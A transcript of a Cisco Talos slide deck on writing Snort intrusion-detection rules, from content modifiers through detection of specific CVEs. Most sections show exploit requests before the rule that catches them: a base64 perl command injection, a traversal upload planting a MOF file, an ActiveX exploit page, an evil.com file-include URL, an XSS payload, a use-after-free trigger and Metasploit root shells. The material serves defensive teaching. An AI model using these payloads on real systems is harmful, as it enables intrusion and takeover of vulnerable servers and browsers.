SlideShare a Scribd company logo

Introduction to Snort Rule Writing

Cisco DevNet, profile picture
Cisco DevNet

This document provides an introduction to Snort rule syntax and content matching. It describes the basic components of a Snort rule including the rule header, action, protocols, addresses, ports, and rule options. It then covers various content matching techniques like content, pcre, and content modifiers like nocase, offset, depth, distance, and within. It also discusses negated content matching, content buffers, and fast_pattern. Finally, it provides examples of how content matching can be used for detection strategies like traffic triage and isolating vulnerable application traffic.

Technology
1 of 83
Downloaded 180 times
1
2
3
4
5
6
7
8
9
10
11
12
13
Most read
14
15
16
17
Most read
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
Most read
79
80
81
82
83
Introduction to Snort Rule Writing
Snort Rule Syntax # rule header alert tcp any any -> 192.168.1.0/24 111 ( rule action protocol src address src port dst address dst port
Snort Rule Syntax # rule option format alert tcp any any -> 192.168.1.0/24 111 ( msg:"Rule Message"; rule option rule option argument
rule option: content # content match example alert tcp any any -> 192.168.1.0/24 111 ( content:"ABCD"; # is equivalent to: content:"|41 42 43 44|"; The content match finds a static pattern in network data.
content modifiers: nocase # content match modifiers: nocase alert tcp any any -> 192.168.1.0/24 111 ( # match "ABCD" or "abcd" etc. content:"ABCD"; nocase; nocase makes a content match case insensitive. content matches are case sensitive by default.
content modifiers: offset # content match modifiers: offset alert tcp any any -> 192.168.1.0/24 111 ( # skip 2 bytes before searching for "ABCD" content:"ABCD"; offset:2; offset requires the match to occur after the designated offset in network data.
content modifiers: depth # content match modifiers: depth alert tcp any any -> 192.168.1.0/24 111 ( # match "ABCD" within the first 4 bytes of the payload content:"ABCD"; depth:4; depth restricts how far Snort should search for the specified pattern.
content modifiers: distance # content match modifiers: distance alert tcp any any -> 192.168.1.0/24 111 ( # find "DEF" 1 byte after "ABC" content:"ABC"; content:"DEF"; distance:1; distance specifies how far into a payload Snort should ignore before starting to search for the specified pattern relative to the end of the previous pattern match.
content modifiers: within # content match modifiers: within alert tcp any any -> 192.168.1.0/24 111 ( # find "EFG" within 10 bytes of "ABC" content:"ABC"; content:"EFG"; within:10; within makes sure that at most N bytes are between pattern matches.
negated content match # negated content match alert tcp any any -> 192.168.1.0/24 111 ( # make sure "EFG" is NOT within 10 bytes of "ABC" content:"ABC"; content:!"EFG"; within:10; content matches can be negated.
content buffers # content buffer example alert tcp any any -> 192.168.1.0/24 111 ( # match "ABC" within the HTTP URI content:"ABC"; http_uri; content matches can be restricted to a payload location, such as the HTTP URI.
content buffers POST /index.php HTTP/1.1 Host: example.com Content-Length: 28 Content-Type: application/x-www-form-urlencoded Cookie: this_is_a_cookie=this_is_its_value firstparam=one&secondparam=two Buffers: http_method http_uri http_header http_cookie http_client_body
content modifiers: fast_pattern # fast_pattern example alert tcp any any -> 192.168.1.0/24 111 ( # set "ABC" as the rule fast_pattern content:"ABC"; fast_pattern; fast_pattern explicitly specifies the content match within a rule to be used with the fast pattern matcher. The fast_pattern serves as the “entrance” condition for rule evaluation.
content modifiers: fast_pattern # fast_pattern:only; example alert tcp any any -> 192.168.1.0/24 111 ( # set "ABC" as the rule fast_pattern content:"ABC"; fast_pattern:only; fast_pattern:only; selects the content match to be used in the fast pattern matcher for the rule and also specifies that this match will not be evaluated again when the rule “enters”.
rule option: pcre # pcre rule option example alert tcp any any -> 192.168.1.0/24 111 ( # match the following regex pcre:"/A[BC]D/i"; pcre declares a Perl compatible regular expression for matching on payload data. Flags can be specified after the slash. e.g. /i for case insensitivity.
Traffic Triage and Isolation Normal Trafficfast_pattern content, etc. Vulnerable Application Traffic Slow Fast pcre content, etc. Vulnerable Parameter Traffic Vulnerability Condition Vulnerability Condition Traffic VolumeSpeed Traffic Type
Detection Strategies
Detection Topics > Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
Buffer Overflow Overview Stack buffer overflow in AVM Fritz!Box daemon dsl_control. AVM Fritz!Box firmware fails to check the length of user supplied data in a 'se' or ScriptExecute command sent in a SOAP request to the dsl_control daemon.
Buffer Overflow Overview dsl_cpi_cli_access.c registers the command 'se' to the DSL_CPE_CLI_ScriptExecute handler function: [...] DSL_CPE_CLI_CMD_ADD_COMM ( "se", "ScriptExecute", DSL_CPE_CLI_ScriptExecute, g_sSe); [...]
Buffer Overflow Overview DSL_CLI_LOCAL DSL_int_t DSL_CPE_CLI_ScriptExecute([...]) { [...] DSL_char_t sFileName[DSL_MAX_COMMAND_LINE_LENGTH] = {0}; if(DSL_CPE_CLI_CheckParamNumber(pCommands,1, DSL_CLI_EQUALS) == DSL_FALSE) { return -1; } DSL_CPE_sscanf(pCommands, "%s", sFileName); [...]
Buffer Overflow Overview The code calls the function DSL_CPE_sscanf in order to copy the value of the parameter pCommands to the local character array sFileName without restricton or bounds checking. The size of the vulnerable stack buffer is 256 bytes as indicated in dsl_cpi_cli_console.h: #define DSL_MAX_COMMAND_LINE_LENGTH 256 Triggering the vulnerability is then a simple matter of sending >256 bytes in the first 'se' parameter.
Buffer Overflow Exploit <?xml version="1.0" encoding="UTF-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV= "http://schemas.xmlsoap.org/soap/envelope/"; xmlns:ifx="urn:dsl_api"> <SOAP-ENV:Body> <ifx:DslCpeCliAccess> <command>se "A"*300</command> </ifx:DslCpeCliAccess> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
Buffer Overflow Detection # vulnerable SOAP request # with at least 256 bytes # within <command></command> # content:"DslCpeCliAccess"; fast_pattern:only; http_client_body; content:"<command"; nocase; http_client_body; isdataat:256,relative; content:!"</command"; nocase; within:256; http_client_body; # stack buffer overflow (>256 bytes) # within param0: <command> se param0 </command> # pcre:"/<command[^>]*?>s*ses[^<]{256}/Pi";
Buffer Overflow Detection alert tcp $EXTERNAL_NET any -> $HOME_NET 8080 ( msg:"SERVER-WEBAPP AVM FritzBox dsl_control stack buffer overflow attempt"; flow:to_server,established; content:"DslCpeCliAccess"; fast_pattern:only; http_client_body; content:"<command"; nocase; http_client_body; isdataat:256,relative; content:!"</command"; within:256; nocase; http_client_body; pcre:"/<command[^>]*?>s*ses[^<]{256}/Pi"; metadata:policy security-ips drop, service http; classtype:attempted-admin; )
Detection Topics > Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
Detection Topics Buffer Overflow > Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
Command Injection Overview CVE-2014-3805 Command injection vulnerabilities in AlienVault OSSIM av- centerd, which accepts SOAP commands on port 40007. SOAP command 'get_log_line' parameter '$number_lines' and 'get_license' parameter '$license_type' are used in OS commands without sanitization.
Command Injection Overview /usr/share/alienvault-center/lib/AV/CC/Util.pm sub get_log_line() { my ( $function_llamada, $name, $uuid, $admin_ip, $hostname, $r_file, $number_lines ) = @_; [...] # $number_lines used in OS command without sanitization my $command = "tail -$number_lines $r_file"; my @content = `$command`; [...] }
Command Injection Overview /usr/share/alienvault-center/lib/AV/CC/Util.pm sub get_license() { my ( $function_llamada, $name, $uuid, $admin_ip, $hostname, $license, $license_type ) = @_; [...] # $license_type used in OS command without sanitization my $package = system ("curl --proxy-anyauth -K /etc/curlrc http://[...]/avl/$license_type/[...]"); }
Command Injection Exploit POST /av-centerd HTTP/1.1 Host: 172.16.8.223:40007 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Length: 765 Content-Type: text/xml; charset=utf-8 SOAPAction: "AV/CC/Util#get_log_line" <?xml version="1.0" encoding="UTF-8"?><soap:Envelope soap:encodingStyle[...]><soap:Body><get_log_line xmlns="AV/CC/Util"><c-gensym3 xsi:type="xsd:string">All[...]</c-gensym3><c-gensym13 xsi:type="xsd:string">&amp;&amp; perl -MMIME::Base64 -e &apos;system(decode_base64(&quot;cGVy[...]</c- gensym13></get_log_line></soap:Body></soap:Envelope>
Command Injection Exploit POST /av-centerd HTTP/1.1 Host: 172.16.8.223:40007 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Length: 765 Content-Type: text/xml; charset=utf-8 SOAPAction: "AV/CC/Util#get_log_line" <?xml version="1.0" encoding="UTF-8"?><soap:Envelope soap:encodingStyle[...]><soap:Body><get_log_line xmlns="AV/CC/Util"><c-gensym3 xsi:type="xsd:string">All[...]</c-gensym3><c-gensym13 xsi:type="xsd:string">&amp;&amp; perl -MMIME::Base64 -e &apos;system(decode_base64(&quot;cGVy[...]</c- gensym13></get_log_line></soap:Body></soap:Envelope>
Command Injection Exploit msf exploit(alienvault_centerd_soap_exec) > exploit [*] Started reverse handler on 172.16.158.1:4444 [*] Command shell session 1 opened (172.16.158.1:4444 -> 172.16.158.173:41320) at 2014-07-19 12:09:00 -0500 id uid=0(root) gid=0(root) groups=0(root) remember traffic isolation...
Command Injection Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP AlienVault OSSIM get_log_line command injection attempt"; flow:to_server,established; content:"/av-centerd"; nocase; http_uri; content:"<get_log_line"; fast_pattern; nocase; http_client_body; content:"xsd:string"; distance:0; nocase; http_client_body; pcre:"/xsdx3astring[^>]*?>[^<]*?([x3bx7cx26x60]|x24x28)/Pi"; metadata:service http; reference:cve,2014-3805; classtype:attempted-admin; )
Command Injection Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP AlienVault OSSIM get_license command injection attempt"; flow:to_server,established; content:"/av-centerd"; nocase; http_uri; content:"<get_license"; fast_pattern; nocase; http_client_body; content:"xsd:string"; distance:0; nocase; http_client_body; pcre:"/xsdx3astring[^>]*?>[^<]*?([x3bx7cx26x60]|x24x28)/Pi"; metadata:service http; reference:cve,2014-3805; classtype:attempted-admin; )
Command Injection Overview CVE-2014-5073 OS command injection vulnerability in VMTurbo Operations Manager vmtadmin.cgi parameter 'fileDate'. If the 'callType' parameter is set to "DOWN" vmtadmin.cgi will pass the value of 'fileDate' to system().
Command Injection Overview my $actiontype = $query->param("actionType"); my $calltype = $query->param("callType"); my $filedate = $query->param("fileDate"); my $statusfile = (defined $filedate) ? $filedate : $mon.".".$mday." [...] [...] elseif ($calltype eq "DOWN") { [...] system("rm "$upload_dir$statusfile""); [...]
Command Injection Exploit GET /cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP &fileDate=%22%60printf%20%27177105114[...] HTTP/1.1 Host: 172.16.41.140 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: application/x-www-form-urlencoded Content-Length: 0
Command Injection Exploit GET /cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP &fileDate=%22%60printf%20%27177105114[...] HTTP/1.1 Host: 172.16.41.140 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: application/x-www-form-urlencoded Content-Length: 0
Command Injection Exploit msf exploit(vmturbo_vmtadmin_exec_noauth) > exploit [*] Started reverse handler on 172.16.158.1:4444 [*] Command shell session 1 opened (172.16.158.1:4444 -> 172.16.158.173:41320) at 2014-07-19 12:09:00 -0500 id uid=0(root) gid=0(root) groups=0(root)
Command Injection Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP VMTurbo vmtadmin.cgi command injection attempt"; flow:to_server,established; metadata:policy security-ips drop, service http; reference:cve,2014-5073; classtype:attempted-admin; ) content:"callType=DOWN"; nocase; http_uri; content:"fileDate="; nocase; http_uri; pcre:"/[?&]fileDate=[^&]*?([x60x3bx7c]|[x3cx3ex24]x28)/Ui"; Start by isolating traffic. content:"/cgi-bin/vmtadmin.cgi"; fast_pattern:only; http_uri;
Command Injection Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP VMTurbo vmtadmin.cgi command injection attempt"; flow:to_server,established; content:"/cgi-bin/vmtadmin.cgi"; fast_pattern:only; http_uri; content:"callType=DOWN"; nocase; http_uri; content:"fileDate="; nocase; http_raw_uri; content:"%26"; distance:0; http_raw_uri; pcre:"/[?&]fileDate=[^&]*?%26/Ii"; metadata:policy security-ips drop, service http; reference:cve,2014-5073; classtype:attempted-admin; )
Detection Topics Buffer Overflow > Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
Detection Topics Buffer Overflow Command Injection > Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
Directory Traversal Overview CVE-2014-2424 Directory traversal vulnerability in Oracle Event processing. FileUploadServlet function processUploadedFile() fails to properly sanitize the filename parameter value. The WMI service can be abused to convert the file upload into remote code execution without user interaction.
Directory Traversal Overview private void processUploadedFile(FileItem paramFileItem) { try { // paramFileItem.getName() used to // create file without verification paramFileItem.write(new File(this.uploadLocation, paramFileItem.getName())); } catch (Exception localException) { [...] } }
Directory Traversal Exploit POST /wlevs/visualizer/upload HTTP/1.1 Host: 172.16.8.29:9002 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: multipart/form-data; boundary=_Part_732_2993821416_1334322828 Content-Length: 2658 --_Part_732_2993821416_1334322828 Content-Disposition: form-data; name="uploadfile"; filename="../../../../../../../WINDOWS/system32/wbem/mof/klIvousnq.mof" Content-Type: application/octet-stream Content-Transfer-Encoding: binary #pragma namespace(".rootcimv2") [...]
Directory Traversal Exploit POST /wlevs/visualizer/upload HTTP/1.1 Host: 172.16.8.29:9002 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Type: multipart/form-data; boundary=_Part_732_2993821416_1334322828 Content-Length: 2658 --_Part_732_2993821416_1334322828 Content-Disposition: form-data; name="uploadfile"; filename="../../../../../../../WINDOWS/system32/wbem/mof/klIvousnq.mof" Content-Type: application/octet-stream Content-Transfer-Encoding: binary #pragma namespace(".rootcimv2") [...]
Directory Traversal Exploit msf exploit(oracle_event_processing_upload) > rexploit [*] Reloading module... [*] Started reverse handler on 172.16.158.1:4444 [*] 172.16.158.198:9002 - Generating payload and mof file... [*] 172.16.158.198:9002 - Uploading the exe payload hENIwUPM.exe... [*] 172.16.158.198:9002 - Uploading the MOF file klIvousnq.mof [*] Sending stage (769536 bytes) to 172.16.158.198 [*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.198:1052) at 2014-06-29 15:42:37 -0500 [+] Deleted wbem/mof/klIvousnq.mof [!] This exploit may require manual cleanup of 'hENIwUPM.exe' on the target meterpreter > getuid Server username: NT AUTHORITYSYSTEM
Directory Traversal Detection # # Multipart POST # content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; content:"filename"; nocase; http_client_body; content:"Content-Disposition"; nocase; http_client_body; pcre:"/filenames*=s*[^rn]*?(x2e|%2e){2}([x2fx5c]|%2f|%5c)/Pi"; # # Urlencoded POST # content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; content:"filename="; nocase; http_client_body; pcre:"/(^|&)filename=[^&]*?(x2e|%2e){2}([x2fx5c]|%2f|%5c)/Pim";
Directory Traversal Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP Oracle Event Processing directory traversal attempt"; flow:to_server,established; content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; content:"filename"; nocase; http_client_body; content:"Content-Disposition"; nocase; http_client_body; pcre:"/filenames*=s*[^rn]*?(x2e|%2e){2}([x2fx5c]|%2f|%5c)/Pi"; metadata:policy balanced-ips drop, policy security-ips drop, service http; reference:cve,2014-2424; classtype:attempted-admin; )
Directory Traversal Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP Oracle Event Processing directory traversal attempt"; flow:to_server,established; content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; content:"filename="; nocase; http_client_body; pcre:"/(^|&)filename=[^&]*?(x2e|%2e){2}([x2fx5c]|%2f|%5c)/Pim"; metadata:policy balanced-ips drop, policy security-ips drop, service http; reference:cve,2014-2424; classtype:attempted-admin; )
Detection Topics Buffer Overflow Command Injection > Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
Detection Topics Buffer Overflow Command Injection Directory Traversal > Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
Use-After-Free Overview CVE-2013-3893 This vulnerability is triggered by Javascript that sets an onlosecapture() handler on the parent of two elements. This handler clears the DOM with document.write() when it is called. The Javascript then calls setCapture() on the parent and the child element. This triggers the onlosecapture() handler, freeing a reference with document.write(). After the free, the invalid reference will remain causing a crash (or code execution) in MSHTML!CTreeNode::GetInterface.
Use-After-Free Trigger function trigger() { var id_0 = document.createElement("sup"); var id_1 = document.createElement("audio"); document.body.appendChild(id_0); document.body.appendChild(id_1); id_1.applyElement(id_0); id_0.onlosecapture=function(e) { document.write(""); } id_0.setCapture(); id_1.setCapture(); }
Use-After-Free Trigger 0:005> r eax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34 eip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 MSHTML!CTreeNode::GetInterface+0xd8: 679b6b61 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=????????
Use-After-Free Detection alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any ( msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt"; flow:to_client,established; file_data; content:".applyElement"; nocase; content:".onlosecapture"; nocase; within:500; fast_pattern; content:".setCapture"; nocase; within:500; content:".setCapture"; nocase; within:500; pcre:"/.applyElements*(s*(?P<var>w+)s*).*?(?P=var).onlosecapture.*?(?P=var).setCapture/si"; metadata:service ftp-data, service http, service imap, service pop3; reference:cve,2013-3893; )
Use-After-Free Detection alert tcp $EXTERNAL_NET any -> $SMTP_SERVERS 25 ( msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt"; flow:to_server,established; file_data; content:".applyElement"; nocase; content:".onlosecapture"; nocase; within:500; fast_pattern; content:".setCapture"; nocase; within:500; content:".setCapture"; nocase; within:500; pcre:"/.applyElements*(s*(?P<var>w+)s*).*?(?P=var).onlosecapture.*?(?P=var).setCapture/si"; metadata:service smtp; reference:cve,2013-3893; )
Detection Topics Buffer Overflow Command Injection Directory Traversal > Use-After-Free Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free > Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
Remote File Include Overview CVE-2008-5053 Remote file include vulnerability in Joomla Simple RSS Reader allows execution of arbitrary PHP code via the parameter mosConfig_live_site in administrator/components/com_rssreader/admin.rssreader.php: include("$mosConfig_live_site/components/com_rssreader/about.html"); $mosConfig_live_site is obtained from the GET parameter of the same name sent to admin.rssreader.php. Exploit: http://site/joomlapath/administrator/components/com_rssreader /admin.rssreader.php?mosConfig_live_site=http://evil.com/
Remote File Include Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP Joomla admin.rssreader.php remote file include attempt"; flow:to_server,established; content:"admin.rssreader.php"; fast_pattern:only; http_uri; content:"mosConfig_live_site="; nocase; http_uri; pcre:"/[?&]mosConfig_live_site=[^&]*?(http|ftp)/Ui"; metadata:service http; reference:cve,2008-5053; classtype:web-application-attack; )
Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free > Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include > Browser Plugins Cross Site Scripting Malware Command Traffic
Browser Plugin Overview CVE-2012-2516 GE Proficy Historian's KeyHelp.ocx ActiveX control adds HTML Help functionality for the Proficy enterprise data collection system. It can be instantiated in a web page using the <object> tag, for example: <object id="ctrl" classid="clsid:45e66957-2932-432a-a156-31503df0a681"> Or using Javascript: obj = new ActiveXObject("KeyHelp.KeyScript")
Browser Plugin Overview The API of this ActiveX object exposes several methods including LaunchTriPane(), which has the following prototype: Void LaunchTriPane(System.string ChmFile) The function LaunchTriPane will use ShellExecute to launch hh.exe, with user controlled data as parameters: > HH.EXE -decompile D:/destination-folder C:/test.chm This can be abused to write arbitrary files. Code execution is possible by uploading a WMI .mof file.
Browser Plugin Disassembly KeyHelp.ocx: 5D335165 CALL KeyHelp.5D31797F 5D33516A JMP SHORT KeyHelp.5D33517D 5D33516C PUSH 5 5D33516E PUSH EDI 5D33516F PUSH ESI ; Malicious command line parameters - no validation 5D335170 PUSH KeyHelp.5D347950 ; ASCII "hh.exe" 5D335175 PUSH EDI 5D335176 PUSH EDI 5D335177 CALL SHELL32.ShellExecuteA ; run hh.exe with malicious params 5D33517D CMP ESI,EDI 5D33517F JE SHORT KeyHelp.5D335187 5D335181 PUSH ESI
Browser Plugin Exploit <html> <body><script> KeyScript = new ActiveXObject("KeyHelp.KeyScript"); ChmPayloadFile = "-decompile C:WINDOWSsystem32 "+ "172.16.211.11A5vTb1QLAqfifDoixwWS.chm"; ChmMofFile = "-decompile c:WINDOWSsystem32wbemmof "+ "172.16.211.11A5vTb1QLAqfifQLQklKr.chm"; KeyScript.LaunchTriPane(ChmPayloadFile); setTimeout('KeyScript.LaunchTriPane(ChmMofFile);',3000); </script></body> </html>
Browser Plugin Detection # # <OBJECT> Detection # alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"BROWSER-PLUGINS GE Proficy Historian KeyHelp ActiveX clsid access attempt"; flow:to_client,established; file_data; content:"45E66957-2932-432A-A156-31503DF0A681"; fast_pattern:only; content:"LaunchTriPane"; nocase; metadata:policy security-ips drop, service http; reference:cve,2012-2516; classtype:attempted-user; )
Browser Plugin Detection # # Javascript Detection # alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"BROWSER-PLUGINS GE Proficy Historian KeyHelp ActiveX clsid access attempt"; flow:to_client,established; file_data; content:"KeyHelp.KeyScript"; fast_pattern:only; content:"LaunchTriPane"; nocase; metadata:policy security-ips drop, service http; reference:cve,2012-2516; classtype:attempted-user; )
Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include > Browser Plugins Cross Site Scripting Malware Command Traffic
Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins > Cross Site Scripting Malware Command Traffic
Cross Site Scripting (XSS) Overview OSVDB-89893 Cross-Site Scripting vulnerability in Nagios XI's Alert Cloud due to insufficient sanitization of ‘width’ and ‘height’ parameters sent to the URI: /includes/components/alertcloud/index.php Exploit: /nagiosxi/includes/components/alertcloud/index.php?height=4"}}; alert('XSS'); var aa={"A":{"B":"
Cross Site Scripting (XSS) Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP Nagios XI alert cloud cross site scripting attempt"; flow:to_server,established; content:"/includes/components/alertcloud/index.php"; fast_pattern:only; http_uri; pcre:"/[?&](height|width)=[^&]*?([x22x27x3cx3ex28x29]|script|onload|src)/Ui"; metadata:service http; reference:url,osvdb.org/show/osvdb/89893; classtype:web-application-attack; )
Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins > Cross Site Scripting Malware Command Traffic
Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting > Malware Command Traffic
Malware Sample Overview Win.Trojan.Sefnit Upon execution Win.Trojan.Sefnit drops a service to %AppData%Updaterupdater.dll and starts it. When the service updater.dll starts it attempts to read tasks from the configuration file %AppData%Updater/~conf.dat Initially the conf.dat file doesn't exist. The sample obtains the Disk Volume Serial number and appends it to the MachineGUID. This string is then encrypted. The sample uses 16 bytes of the encrypted value and converts it to a 32 character hex string and uses this string as a UUID sent in the initial request to C2: GET /j/20a0b8237d5b084e46bd673e26d948bf/0001 HTTP/1.1 Host: axnlze.net Accept: */* The URI above has the following hardcoded format: hxxp://<c2domain>/j/<uuid>/<version>
Malware Sample Disassembly 10015B27 PUSH 10112E28 ; /Arg1 = UNICODE ;"c2.net/j/<uuid>/<version>" 10015B2C LEA ECX,DWORD PTR SS:[EBP-4C] ; | 10015B2F CALL <_wcslen-copystr> ; updater.10001BA4 10015B34 MOV BYTE PTR SS:[EBP-4],1 10015B38 MOV EDI,10112E14 ; UNICODE "<uuid>" 10015B3D PUSH EDI ; /Arg1 => 10112E14 10015B3E CALL <_wcslen> ; updater.100196E1 ... 10015BBB PUSH ESI ; UNICODE "<version>" 10015BBC LEA ECX,DWORD PTR SS:[EBP-4C] 10015BBF CALL <substr_loc> 10015BC4 MOV DWORD PTR SS:[EBP-1DC],EAX 10015BCA PUSH ESI ; UNICODE "<version>" 10015BCB CALL <_wcslen> 10015BD0 MOV DWORD PTR SS:[EBP-1EC],EAX 10015BD6 MOV EDI,10112E08 ; UNICODE "0001" ... 1005A043 PUSH 0 ; /Arg4 = 00000000 1005A045 PUSH ECX ; |Arg3 = 008DAA60 ASCII ; "/j/20a0b8237d5b084e46bd673e26d948bf/0001" 1005A046 PUSH EBX ; |Arg2 = 1011B340 ASCII "GET" 1005A047 PUSH EDI ; |Arg1 008C9138 = NULL 1005A048 CALL 10058E00 ; updater.10058E00
Malware Command Traffic Detection # # C2 request detection # # hardcoded urilen urilen:40,norm; # hardcoded uri pattern, begins with "/j/" content:"/j/"; depth:3; http_uri; # ends with "/0001" content:"/0001"; distance:32; within:5; http_uri; # no User-Agent in C2 request content:!"User-Agent"; http_header; # final verification of C2 URI pattern pcre:"/^x2fjx2f[a-f0-9]{32}x2f0001$/U";
Malware Command Traffic Detection alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS ( msg:"MALWARE-CNC Win.Trojan.Sefnit variant outbound connection attempt"; flow:to_server,established; urilen:40,norm; content:"/j/"; depth:3; http_uri; content:"/0001"; within:5; distance:32; http_uri; content:!"User-Agent"; http_header; pcre:"/^x2fjx2f[a-f0-9]{32}x2f0001$/U"; metadata:impact_flag red, service http; classtype:trojan-activity; )
Call to Action • Related sessions: • Introduction to Snort Rule Writing • Detection Strategies with Snort [DevNet-1126] • Visit the World of Solutions for • Cisco Campus • Walk in Labs • Technical Solution Clinics • Meet the Engineer - Available immediately after this talk.
Brandon Stultz talosintel.com @talossecurity

More Related Content

PPTX
Subnetting (FLSM & VLSM) with examples
Krishna Mohan
 
PPTX
Iptables the Linux Firewall
Syed fawad Gillani
 
PDF
Wireshark Lab HTTP, DNS and ARP v7 solution
United International University
 
PPT
Arp spoofing
Luthfi Widyanto
 
PPT
Acl
Raghu Kiran
 
PPTX
Multipath TCP
Olivier Bonaventure
 
PDF
Network commands
Dr. Mahadev Gawas
 
PPTX
Wireshark Packet Analyzer.pptx
Carlos González García, PMP®
 
Subnetting (FLSM & VLSM) with examples
Krishna Mohan
 
Iptables the Linux Firewall
Syed fawad Gillani
 
Wireshark Lab HTTP, DNS and ARP v7 solution
United International University
 
Arp spoofing
Luthfi Widyanto
 
Acl
Raghu Kiran
 
Multipath TCP
Olivier Bonaventure
 
Network commands
Dr. Mahadev Gawas
 
Wireshark Packet Analyzer.pptx
Carlos González García, PMP®
 

What's hot (20)

PPT
authentication.ppt
jayarao21
 
PPTX
Rotor Cipher and Enigma Machine
Saurabh Kaushik
 
PPTX
Enumeration and system hacking
begmohsin
 
PDF
Snort implementation
Rokitta Apollonia
 
PPTX
Message digest 5
Tirthika Bandi
 
PPTX
MACs based on Hash Functions, MACs based on Block Ciphers
Maitree Patel
 
PPTX
Secure Hash Algorithm
Vishakha Agarwal
 
PPT
Network Intrusion Detection System Using Snort
Disha Bedi
 
PPTX
DMA Survival Guide
Kernel TLV
 
PPTX
Hash function
Harry Potter
 
PDF
64 Methods for Mimikatz Execution
Hadess
 
PDF
Conférence: Catalyseurs de l'Intelligence Artificielle et Écosystème des Fram...
ENSET, Université Hassan II Casablanca
 
PDF
Linux Kernel - Virtual File System
Adrian Huang
 
PDF
"CERT Secure Coding Standards" by Dr. Mark Sherman
Rinaldi Rampen
 
PDF
Upping the APT hunting game: learn the best YARA practices from Kaspersky
Kaspersky
 
PPTX
JAVA
Axel KAMALAK
 
PDF
Paradigmes de Programmation
mahfoudsam
 
PPT
Secure shell ppt
sravya raju
 
PPTX
Introduction to Snort
Hossein Yavari
 
PPTX
Ssh (The Secure Shell)
Mehedi Farazi
 
authentication.ppt
jayarao21
 
Rotor Cipher and Enigma Machine
Saurabh Kaushik
 
Enumeration and system hacking
begmohsin
 
Snort implementation
Rokitta Apollonia
 
Message digest 5
Tirthika Bandi
 
MACs based on Hash Functions, MACs based on Block Ciphers
Maitree Patel
 
Secure Hash Algorithm
Vishakha Agarwal
 
Network Intrusion Detection System Using Snort
Disha Bedi
 
DMA Survival Guide
Kernel TLV
 
Hash function
Harry Potter
 
64 Methods for Mimikatz Execution
Hadess
 
Conférence: Catalyseurs de l'Intelligence Artificielle et Écosystème des Fram...
ENSET, Université Hassan II Casablanca
 
Linux Kernel - Virtual File System
Adrian Huang
 
"CERT Secure Coding Standards" by Dr. Mark Sherman
Rinaldi Rampen
 
Upping the APT hunting game: learn the best YARA practices from Kaspersky
Kaspersky
 
JAVA
Axel KAMALAK
 
Paradigmes de Programmation
mahfoudsam
 
